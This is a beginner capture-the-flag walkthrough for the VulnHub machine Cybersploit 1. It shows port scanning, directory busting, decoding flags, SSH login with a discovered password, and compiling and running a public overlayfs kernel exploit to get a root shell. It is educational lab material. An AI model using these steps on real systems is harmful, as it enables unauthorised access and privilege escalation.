Capture the flag walkthrough: Cybersploit 1 (VulnHub)


Introduction

This is a walkthrough for the Cybersploit: 1 capture the flag challenge, available on VulnHub. The machine is listed as beginner-friendly and there are three flags to be captured.

It is assumed you have the virtual machine up and running and accessible over the network from your host machine.

My setup is an old laptop booted into a live version of Kali Linux. I installed virt-manager in Kali in order to run the Cybersploit: 1 virtual machine. As a precautionary measure, the laptop is not connected to any network.

Note: As this is a beginner level challenge the walkthrough will be fairly detailed, explaining the commands used, discussing methodologies, and recording the findings in a notebook.

Scanning

A good first step is to run a port scan against the machine using Nmap. We'll start off with a quick scan, just to find any open ports. We can then perform an aggressive scan on the open ports which will hopefully tell us more about the services running behind them.

Quick scan

This quick and basic scan that we'll perform is a SYN scan, also known as a stealth scan. This is actually the default type of scan run by Nmap (provided the user has raw-packet privileges) so it's not actually necessary to specify the scan type however I have included it to be explicit.

kali@kali:~$ sudo nmap -T4 -sS -p- 192.168.100.218
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-19 07:46 UTC
Nmap scan report for 192.168.100.218
Host is up (0.0016s latency)
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 52:54:00:37:8A:FD (QEMU virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.82 seconds

The following is an overview of the arguments passed to Nmap:

The results of the scan show that ports 22 and 80 are open, indicating the machine is most likely running an SSH and HTTP server. To be sure, let's run an aggressive scan.

Aggressive scan

Nmap provides the -A option which we can use to perform a more aggressive scan, running additional tests such as remote OS detection and service/version detection. These details are key when determining the vulnerabilities that may be present on the target machine.

An aggressive scan takes longer to run but now that we know which ports are open we can limit the scan accordingly.

 kali@kali:~$ sudo nmap -T4 -sS -p22,80 -A 192.168.100.218
 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-19 07:48 UTC
 Nmap scan report for 192.168.100.218
 Host is up (0.00063s latency)
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
 |   2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
 |_  256 ef:43:5b:d9:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
 80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
 |_http-server-header: Apache httpd 2.2.22 (Ubuntu)
 |_http-title: Hello Pentester!
 MAC Address: 52:54:00:37:8A:FD (QEMU virtual NIC)
 Devide type: general purpose
 Running: Linux 3.X|4.X
 OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
 OS details: Linux 3.2 - 4.9
 Network Distance: 1 hop
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

 TRACEROUTE
 HOP RTT     ADDRESS
 1   0.63ms 192.168.100.218

 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

 Nmap done: 1 IP address (1 host up) scanned in 17.31 seconds

We pass the same arguments to Nmap however we limit the ports to be scanned to 22 and 80 and we include the -A option. The results of the aggressive scan have revealed some important information, in particular the SSH and HTTP server software running on the machine - Open SSH 5.9p1 and Apache httpd 2.2.22.

Update the notebook

A great habit to get into is to record the information you discover in a notebook. The Nmap scan has provided us with some good initial information about the machine which we should jot down. Here's what my notes look like so far.

notes.md

# Machine Info

## General
IP: 192.168.100.218
OS: Ubuntu
Users:

## HTTP
Apache httpd 2.2.22

## SSH
OpenSSH 5.9p1

# Flags
Flag 1:
Flag 2:
Flag 3:

HTTP enumeration

Default web page

We know the machine is running the Apache web server which is listening on port 80. Let's visit the website in our browser (in my case the address is http://192.168.100.218) and check if a default web page is served. Sure enough, this is the case.

At first glance there doesn't appear to be anything particularly important1 so let's view the source. Scrolling down to the bottom of the source there's a comment that appears to reveal a username.

<!------------- user:itsskv --------------------->

Let's make a note of that and add itsskv to the Users entry in the notes.

Directory busting

While it doesn't look like there's any other useful content on this web page we can try and find other directories and files that might be publicly accessible. One way to do this is directory busting, which is a brute-force dictionary attack on a web server. In short, for every entry in the dictionary (a long list of words) a program attempts to retrieve a directory or file on the web server with the same name.

There are a couple of popular programs, such as dirb and gobuster. Let's try dirb and see what results we get.

kali@kali:~$ dirb http://192.168.100.218

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Jul 20 04:55:34 2020
URL_BASE: http://192.168.100.218/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.122.106/ ----
+ http://192.168.100.218/cgi-bin/ (CODE:403|SIZE:291)  
+ http://192.168.100.218/hacker (CODE:200|SIZE:3757743)
+ http://192.168.100.218/index (CODE:200|SIZE:2333)
+ http://192.168.100.218/index.html (CODE:200|SIZE:2333)
+ http://192.168.100.218/robots (CODE:200|SIZE:79)
+ http://192.168.100.218/robots.txt (CODE:200|SIZE:79)
+ http://192.168.100.218/server-status (CODE:403|SIZE:296)

-----------------
END_TIME: Mon Jul 20 04:55:37 2020
DOWNLOADED: 4612 - FOUND: 7

There are three files that responded with a 200, which means they are publicly accessible; /hacker which is the animated GIF, /index.html which is the default page we have already seen, and /robots.txt2. Let's point our browser at http://192.168.100.218/robots.txt and take a look at this file (make sure to use the correct IP address of your target machine).

robots.txt

R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9

This looks rather interesting and could be a message that has been encoded. A common encoding scheme is base64, so let's download the robots.txt file try and decode its content.

kali@kali$ wget http://192.168.100.218/robots.txt
kali@kali$ cat robots.txt | base64 -d
Good Work!
Flag1: cybersploit{youtube.com/c/cybersploit}

That worked! We have the first flag.

If we didn't get a meaningful result when decoding via base64 we would then try other decoders. There are websites which will display a given string decoded using a variety of schemes.

Update the notebook

It's time to update the notebook, here's what mine looks like.

notes.md

# Machine Info

## General
IP: 192.168.100.218
OS: Ubuntu
Users: itsskv

## HTTP
Apache httpd 2.2.22

## SSH
OpenSSH 5.9p1

# Flags
Flag 1: cybersploit{youtube.com/c/cybersploit}
Flag 2:
Flag 3:

What now?

So, we've scanned the target machine with Nmap, explored the publicly accessible files and directories on the web server, and have found what we believe to be a username along with the first flag. Where do we go from here?

It doesn't look like there's a way to upload a file to the web server and attempt to use a server side scripting language, such as PHP, to gain remote access. As we have what we believe to be a username, let's switch our focus to the SSH server and see if we can log in.

SSH enumeration

We could try to log into the SSH server as the user itsskv via a brute-force attack, using a tool such as hydra, however, before going down that path, I want to try a couple of obvious passwords, including the first flag.

kali@kali$ ssh itsskv@192.168.100.218
itsskv@192.168.100.218's password: <TYPE FLAG 1 HERE>
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)
...
itsskv@cybersploit-CTF:~$

We're in! Let's have a look around the file system and see what we can find.

itsskv@cybersploit-CTF:~$ ls -l
drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Desktop
drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Documents
drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Downloads
-rw-r--r-- 1 itsskv itsskv 8445 Jun 25 12:11 examples.desktop
-rw-rw-r-- 1 itsskv itsskv  495 Jun 27 10:03 flag2.txt
drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Music
drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Pictures
drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Public
drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Templates
drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Videos

The file flag2.txt looks promising, let's check it out.

itsskv@cybersploit-CTF:~$ cat flag2.txt
01100111 01101111 ... 00110001 01111101

We've found another file that contains encoded data, this time in binary. While there are many websites which will decode binary, my laptop wasn't connected to the Internet so I wrote the following Python program to decode the message.

decode_binary.py

with open('flag2.txt') as f:
    data = f.read().strip()

chars = data.split(' ')
message = [chr(int(char, 2)) for char in chars]

print(''.join(message))

And if we run the program...

itsskv@cybersploit-CTF:~$ python decode_binary.py
good work !
flag2: cybersploit{https:t.me/cybersploit}

We now have the second flag!

OS vulnerabilities

User privileges

We have access to the machine as the user itsskv but we don't know what privileges this user may or may not have. Let's check.

 itsskv@cybersploit-CTF:~$ id
 uid=1001(itsskv) gid=1001(itsskv) groups=1001(itsskv)

 itsskv@cybersploit-CTF:~$ sudo -l
 Sorry, user itsskv may not run sudo on cybersploit-CTF

The user itsskv doesn't have any privileges that will allow us to explore the file system without restriction. There may be files that have been given explicit permission to itsskv, however, instead of searching for those let's see if we can find a vulnerability that will allow us to elevate our privileges.

Linux kernel vulnerabilities

First we need to determine some basic information about the system we've logged into.

itsskv@cybersploit-CTF:~$ uname -sr
Linux 3.13.0-32-generic

itsskv@cybersploit-CTF:~$ lsb_release -a
Distributor ID: Ubuntu
Description:    Ubuntu 12.04.5 LTS
Release:        12.04
Codename:       precise

The kernel version is quite old, released back in 2014, so it's likely that we'll be able to find a privilege escalation vulnerability. Using the tool SearchSploit we can look for such exploits.

kali@kali:~$ searchsploit kernel 3.13
----------------------------------------- ----------------------
 Exploit Title                           |  Path
----------------------------------------- ----------------------
Android Kernel < 4.8 - ptrace seccomp Fi | android/dos/46434.c
Apple iOS < 10.3.1 - Kernel              | ios/local/42555.txt
Apple Mac OSX < 10.6.7 - Kernel Panic (D | osx/dos/17901.c
...
Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFO | linux/local/41995.c
Linux Kernel 3.13 - SGID Privilege Escal | linux/local/33824.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04 | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04 | linux/local/37293.txt
Linux Kernel 3.13.1 - 'Recvmmsg' Local P | linux/local/40503.rb
Linux Kernel 3.13/3.14 (Ubuntu) - 'splic | linux/dos/36743.c
...
Linux Kernel < 4.5.1 - Off-By-One (PoC)  | linux/dos/44301.c
macOS < 10.14.3 / iOS < 12.1.3 - Kernel  | multiple/dos/46300.c
----------------------------------------- ----------------------
Shellcodes: No Results

It looks like there are a few exploits that match both the kernel version and the distribution version. Let's try the first one that matches both versions (highlighted above), which has the Path linux/local/37292.c. 37292 is the exploit identifier.

Update the notebook

Before we move onto the next stage of the attack, we should record this new information in the notes.

notes.md

# Machine Info

## General
IP: 192.168.100.218
Kernel: Linux 3.13.0-32-generic
Distribution: Ubuntu 12.04.5 LTS precise
Users: itsskv

## HTTP
Apache httpd 2.2.22

## SSH
OpenSSH 5.9p1

# Flags
Flag 1: cybersploit{youtube.com/c/cybersploit}
Flag 2: cybersploit{https:t.me/cybersploit}
Flag 3:

Building the exploit

The exploit we found is a program written in C which we will need to compile. We can find the full path to the source code for this program by running searchsploit with the -p option and passing the exploit identifier.

kali@kali:~$ searchsploit -p 37292
  Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/37292.c
     PATH: /usr/share/exploitdb/exploits/linux/local/37292.c
File Type: C source, ASCII text, with very long lines, with CRLF line terminators

Copy the C source file to a suitable location on your machine and compile it. As the Linux kernel on the target machine is 32bit (indicated in the output of uname above), we need to use the -m32 option with gcc, which will generate 32bit i386 code.

kali@kali:~$ cp /usr/share/exploitdb/exploits/linux/local/37292.c .
kali@kali:~$ gcc -m32 37292.c -o exploit

If you receive the compiler error bits/libc-header-start.h: No such file or directory then you will need to install the gcc-multilib package. Alternatively, you could copy the source file to the target machine and compile it there.

Running the exploit

Now that we have the exploit we just need to transfer it to the target machine and run it. We can use our SSH access to copy files to the machine.

kali@kali:~$ scp exploit itsskv@192.168.100.218:/home/itsskv/Downloads
itsskv@192.168.100.218's password: <TYPE FLAG 1 HERE>
exploit

Let's log into the target machine via SSH and run the exploit.

kali@kali$ ssh itsskv@192.168.100.218
itsskv@192.168.100.218's password: <TYPE FLAG 1 HERE>
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)
...
itsskv@cybersploit-CTF:~$ cd Downloads
itsskv@cybersploit-CTF:~$ ls
exploit
itsskv@cybersploit-CTF:~$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
#

The exploit ran successfully and we have a new prompt - the # symbol. Let's explore a little further.

# whoami
root
# cd /root
# ls
finalflag.txt
# cat finalflag.txt
...
flag3: cybersploit{Z3X21CW42C4 many many congratulations !}
...

We have the third and final flag!

Going over those commands, we ran whoami to check which user we were running as. It turned out to be the root user which means the privilege escalation worked. We then changed to the root user's home directory, listed the contents of the directory, and discovered the final flag.

Update the notebook

It's time to update the notebook, here's mine below.

notes.md

# Machine Info

## General
IP: 192.168.100.218
Kernel: Linux 3.13.0-32-generic
Distribution: Ubuntu 12.04.5 LTS precise
Users: itsskv

## HTTP
Apache httpd 2.2.22

## SSH
OpenSSH 5.9p1

# Exploits

## Linux kernel
Vulnerable to overlayfs local privilege escalation
https://www.exploit-db.com/exploits/37292

# Flags
Flag 1: cybersploit{youtube.com/c/cybersploit}
Flag 2: cybersploit{https:t.me/cybersploit}
Flag 3: cybersploit{Z3X21CW42C4 many many congratulations !}

Concluding thoughts

This was a fun, beginner-friendly capture the flag exercise which covered port scanning with Nmap, encoding/decoding, and using the Exploit Database (via searchsploit) to locate a suitable exploit.

Hopefully you enjoyed the exercise and are keen to try out another capture the flag challenge soon.


  1. I did wonder if some information had been encoded in the animated GIF via steganography but that didn't appear to be the case. 

  2. robots.txt is a file intended to be read by bots, providing instructions on how to crawl the site. It's a good idea to check for the presence of a robots.txt file as it can certainly reveal important information about the web site.